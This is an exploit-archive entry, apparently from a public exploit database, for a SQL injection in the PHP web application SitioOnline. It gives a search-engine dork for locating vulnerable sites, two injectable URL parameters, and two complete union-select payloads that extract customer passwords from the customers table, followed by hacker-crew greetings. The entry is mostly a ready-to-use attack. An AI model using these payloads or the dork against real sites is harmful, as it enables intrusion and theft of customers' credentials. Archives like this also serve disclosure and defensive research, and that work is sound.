SitioOnline - SQL Injection

Author: 4lG3r14n0-t3r0
type: webapps
platform: php
port: 
date_added: 2009-12-14  
date_updated:   
verified: 1  
codes: OSVDB-61062;OSVDB-61061  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 10453.txt  
  **********************- cvs -vrew ***********************

[!]            SitioOnline SQL Injection Vulnerability
[!] Author    : 4lG3r14n0-t3r0
[!] MAIL      : v5@hotmail.de

***************************************************************************/

[ Software Information ]

[+] Vendor : http://www.SitioOnline.cl
[+] script   : SitioOnline
[+] Download :
[+] Vulnerability : php SQL injection
[+] Dork :inurl:"lista_articulos.php?id_categoria="
    or Powered by SitioOnline.com


**************************************************************************/
[ Vulnerable File ]

http://server/lista_articulos.php?id_categoria=

http://server/detalle_articulo.php?id_producto=

[ Exploit ]

[1]

http://server/lista_articulos.php?id_categoria=42+union+select+1,customers_password+from+customers--


[2]


http://server/detalle_articulo.php?id_producto=-7+union+select+1,customers_password+from+customers--

[  Greets ]

[+] :cvs crew : ange78 , saf1-casanova,jess-injection,ijection-master,dark-master , alqaiser, u$er-maskine  , ALL HACKERS MUSLIMS

& all members of : tryag.cc , hackteach.org

made in algeria

N'est pas mort ce qui à jamais dort
________________________________
PC, téléphones portables, souris hi-tech. à gagner grâce à Hotmail ! C'est ici !<http://www.hotmailmagicmoment.com>